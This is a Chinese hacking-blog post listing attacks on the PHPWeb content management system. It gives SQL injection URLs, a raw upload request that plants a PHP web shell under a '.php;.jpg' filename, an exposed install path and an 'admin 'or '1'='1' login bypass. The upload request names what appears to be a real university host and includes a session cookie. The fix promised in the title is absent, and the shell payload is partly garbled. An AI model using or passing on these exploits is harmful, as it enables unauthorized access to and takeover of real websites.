首页 » 网站攻防 » 网站漏洞 » 浏览内容

phpweb注射+上传+安装文件漏洞+万能密码(含修复方案)

501 0 发表评论

# Author: lostowlf home: hi.baidu.com/nginxshell
测试:
******sqlinjection*******
http://www.phpweb.net/down/class/index.php?myord=1{sqlinjection}
http://www.phpweb.net/photo/clas … mp;key=&myord=1 {sqlinjection}
***********getshell********
POST /kedit/upload_cgi/upload.php HTTP/1.0″
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/xaml+xml, application/vnd.ms-xpsdocument, application/x-ms-xbap, application/x-ms-application, */*
Referer: http://phpweb.net/news/admin/new … p;pid=all&page=
Accept-Language: zh-cn
Content-Type: multipart/form-data; boundary=—————————7db516c0118
UA-CPU: x86
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Host: lib.jlnu.edu.cn
Proxy-Connection: Keep-Alive
Cookie: CODEIMG=6878; SYSZC=c7646d833635a773e6a89e364d9f0eca; SYSUSER=wlf; SYSNAME=%E7%8E%8B%E7%AB%8B%E5%B3%B0; SYSUSERID=15; SYSTM=1318373657- D1 F$ M( R3 _8 {3 U. V
Content-Length: 6620
—————————–7db516c0118
Content-Disposition: form-data; name=”fileName”
201110121318373662005.php;.jpg
—————————–7db516c0118
Content-Disposition: form-data; name=”attachPath”
news/pics/
—————————–7db516c0118
Content-Disposition: form-data; name=”fileData”; filename=”C:6.gif”
Content-Type: image/gif
gif89a
‘);?>
*********install file:**********
https://www.exehack.net /base/install/
*********admin********
www.exehack.net /admin.php
username: admin ‘or ’1′=’1
username: admin ‘or ’1′=’1

标签:

评论 共 0 条 (RSS 2.0) 发表 评论

  1. 暂无评论,快来抢沙发!

发表评论

  •   没有头像?

关注我们,实时联系

通知公告">更多...

♥如果喜欢本站可以直接点击订阅博客
♥点击此加入晓残博客会员群加入扣群
♥本站免费提供加密解密服务点击解密
♥伙伴们喜欢本站赏个好评呗

关注微信

有偿服务

博客统计

  • 日志总数:477 篇
  • 评论数目:1474 条
  • 标签总数:40 个
  • 页面总数:8 个
  • 分类总数:17 个
  • 友链总数:24 个
  • 建站日期:2011-02-13
  • 运行天数:2124 天
  • 最后更新:2016-12-6

订阅博客